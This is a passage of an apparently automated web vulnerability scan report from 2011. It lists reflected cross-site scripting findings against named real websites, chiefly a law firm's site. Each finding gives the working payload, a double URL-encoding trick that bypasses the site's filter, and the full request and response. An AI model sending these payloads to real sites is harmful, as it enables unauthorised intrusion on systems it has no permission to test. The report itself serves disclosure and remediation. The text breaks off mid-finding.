Set-Cookie: Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/; HttpOnly
Set-Cookie: ASP.NET_SessionId=2rtk5eyh144bhwn4mxrat4ro; path=/; HttpOnly
Set-Cookie: CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1085&RootPortletID=665&RootPortletH4AssetID=1301&LicenseKey= &Name=Web Framework&URL=wc; path=/; HttpOnly
Set-Cookie: ZoneId=7; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 19431
Set-Cookie: NSC_MC_XfjmQpe_B0102=ffffffff09d5f61c45525d5f4f58455e445a4a423660;path=/


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html>
<head>
<title id="ctl00_htmlTitle">Weil, Gotshal &amp; Man
...[SNIP]...
<![CDATA[
var myForm=document.forms['aspnetForm'];if(!myForm){myForm=document.aspnetForm;}myForm.action='/'+''+'Home.aspx?cd131'-alert(1)-'83a7499dccf=1';//]]>
...[SNIP]...

2.50. http://www.wileyrein.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 85981"><script>alert(1)</script>038dfd0999c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?85981"><script>alert(1)</script>038dfd0999c=1 HTTP/1.1
Host: www.wileyrein.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:10:49 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=18263798;expires=Fri, 11-Jan-2041 15:10:49 GMT;path=/
Set-Cookie: CFTOKEN=29109429;expires=Fri, 11-Jan-2041 15:10:49 GMT;path=/
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="85981"><script>alert(1)</script>038dfd0999c" value="1">
...[SNIP]...

2.51. http://www.wileyrein.com/css/_blog.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /css/_blog.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 490d8%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ea3a95841ba2 was submitted in the REST URL parameter 1. This input was echoed as 490d8"><script>alert(1)</script>a3a95841ba2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /css490d8%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ea3a95841ba2/_blog.css HTTP/1.1
Host: www.wileyrein.com
Proxy-Connection: keep-alive
Referer: http://www.wileyrein.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=18263656; CFTOKEN=43582841

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:13:21 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/css490d8"><script>alert(1)</script>a3a95841ba2/_blog.css" value="">
...[SNIP]...

2.52. http://www.wileyrein.com/css/_blog.css [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /css/_blog.css

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1c8c9%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e84fbe621327 was submitted in the REST URL parameter 2. This input was echoed as 1c8c9"><script>alert(1)</script>84fbe621327 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /css/_blog.css1c8c9%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e84fbe621327 HTTP/1.1
Host: www.wileyrein.com
Proxy-Connection: keep-alive
Referer: http://www.wileyrein.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=18263656; CFTOKEN=43582841

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:13:22 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/css/_blog.css1c8c9"><script>alert(1)</script>84fbe621327" value="">
...[SNIP]...

2.53. http://www.wileyrein.com/css/_list.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /css/_list.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 86d6e%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ea6da1f2345d was submitted in the REST URL parameter 1. This input was echoed as 86d6e"><script>alert(1)</script>a6da1f2345d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /css86d6e%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ea6da1f2345d/_list.css HTTP/1.1
Host: www.wileyrein.com
Proxy-Connection: keep-alive
Referer: http://www.wileyrein.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=18263656; CFTOKEN=43582841

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:13:23 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/css86d6e"><script>alert(1)</script>a6da1f2345d/_list.css" value="">
...[SNIP]...

2.54. http://www.wileyrein.com/css/_list.css [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /css/_list.css

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d81ed%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eda2c05f8831 was submitted in the REST URL parameter 2. This input was echoed as d81ed"><script>alert(1)</script>da2c05f8831 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /css/_list.cssd81ed%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eda2c05f8831 HTTP/1.1
Host: www.wileyrein.com
Proxy-Connection: keep-alive
Referer: http://www.wileyrein.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=18263656; CFTOKEN=43582841

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:13:24 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/css/_list.cssd81ed"><script>alert(1)</script>da2c05f8831" value="">
...[SNIP]...

2.55. http://www.wileyrein.com/css/_main.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /css/_main.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bdd5f%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e672638c3b was submitted in the REST URL parameter 1. This input was echoed as bdd5f"><script>alert(1)</script>672638c3b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /cssbdd5f%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e672638c3b/_main.css HTTP/1.1
Host: www.wileyrein.com
Proxy-Connection: keep-alive
Referer: http://www.wileyrein.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=18263656; CFTOKEN=43582841

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:12:57 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/cssbdd5f"><script>alert(1)</script>672638c3b/_main.css" value="">
...[SNIP]...

2.56. http://www.wileyrein.com/css/_main.css [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /css/_main.css

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f1b51%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e450c96039aa was submitted in the REST URL parameter 2. This input was echoed as f1b51"><script>alert(1)</script>450c96039aa in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /css/_main.cssf1b51%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e450c96039aa HTTP/1.1
Host: www.wileyrein.com
Proxy-Connection: keep-alive
Referer: http://www.wileyrein.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=18263656; CFTOKEN=43582841

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:12:58 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/css/_main.cssf1b51"><script>alert(1)</script>450c96039aa" value="">
...[SNIP]...

2.57. http://www.wileyrein.com/css/_navMenu.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /css/_navMenu.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload de5e6%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e848b9694317 was submitted in the REST URL parameter 1. This input was echoed as de5e6"><script>alert(1)</script>848b9694317 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /cssde5e6%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e848b9694317/_navMenu.css HTTP/1.1
Host: www.wileyrein.com
Proxy-Connection: keep-alive
Referer: http://www.wileyrein.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=18263656; CFTOKEN=43582841

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:13:23 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/cssde5e6"><script>alert(1)</script>848b9694317/_navMenu.css" value="">
...[SNIP]...

2.58. http://www.wileyrein.com/css/_navMenu.css [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /css/_navMenu.css

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 95db9%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eaee734d6695 was submitted in the REST URL parameter 2. This input was echoed as 95db9"><script>alert(1)</script>aee734d6695 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /css/_navMenu.css95db9%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eaee734d6695 HTTP/1.1
Host: www.wileyrein.com
Proxy-Connection: keep-alive
Referer: http://www.wileyrein.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=18263656; CFTOKEN=43582841

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:13:24 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/css/_navMenu.css95db9"><script>alert(1)</script>aee734d6695" value="">
...[SNIP]...

2.59. http://www.wileyrein.com/css/_navSearch.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /css/_navSearch.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 25b68%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ec5762ef40df was submitted in the REST URL parameter 1. This input was echoed as 25b68"><script>alert(1)</script>c5762ef40df in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /css25b68%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ec5762ef40df/_navSearch.css HTTP/1.1
Host: www.wileyrein.com
Proxy-Connection: keep-alive
Referer: http://www.wileyrein.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=18263656; CFTOKEN=43582841

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:12:58 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/css25b68"><script>alert(1)</script>c5762ef40df/_navSearch.css" value="">
...[SNIP]...

2.60. http://www.wileyrein.com/css/_navSearch.css [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /css/_navSearch.css

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fd77a%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e0a210746c61 was submitted in the REST URL parameter 2. This input was echoed as fd77a"><script>alert(1)</script>0a210746c61 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /css/_navSearch.cssfd77a%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e0a210746c61 HTTP/1.1
Host: www.wileyrein.com
Proxy-Connection: keep-alive
Referer: http://www.wileyrein.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=18263656; CFTOKEN=43582841

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:12:59 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/css/_navSearch.cssfd77a"><script>alert(1)</script>0a210746c61" value="">
...[SNIP]...

2.61. http://www.wileyrein.com/css/_slide.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /css/_slide.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 17ef6%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eb4bcf499c51 was submitted in the REST URL parameter 1. This input was echoed as 17ef6"><script>alert(1)</script>b4bcf499c51 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /css17ef6%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eb4bcf499c51/_slide.css HTTP/1.1
Host: www.wileyrein.com
Proxy-Connection: keep-alive
Referer: http://www.wileyrein.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=18263656; CFTOKEN=43582841

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:12:56 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/css17ef6"><script>alert(1)</script>b4bcf499c51/_slide.css" value="">
...[SNIP]...

2.62. http://www.wileyrein.com/css/_slide.css [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /css/_slide.css

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dfc8a%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253edf9115355d was submitted in the REST URL parameter 2. This input was echoed as dfc8a"><script>alert(1)</script>df9115355d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /css/_slide.cssdfc8a%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253edf9115355d HTTP/1.1
Host: www.wileyrein.com
Proxy-Connection: keep-alive
Referer: http://www.wileyrein.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=18263656; CFTOKEN=43582841

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:12:57 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/css/_slide.cssdfc8a"><script>alert(1)</script>df9115355d" value="">
...[SNIP]...

2.63. http://www.wileyrein.com/css/main.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /css/main.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 51eff%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e085a170e769 was submitted in the REST URL parameter 1. This input was echoed as 51eff"><script>alert(1)</script>085a170e769 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /css51eff%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e085a170e769/main.css HTTP/1.1
Host: www.wileyrein.com
Proxy-Connection: keep-alive
Referer: http://www.wileyrein.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=18263656; CFTOKEN=43582841

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:12:04 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/css51eff"><script>alert(1)</script>085a170e769/main.css" value="">
...[SNIP]...

2.64. http://www.wileyrein.com/css/main.css [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /css/main.css

Issue detail

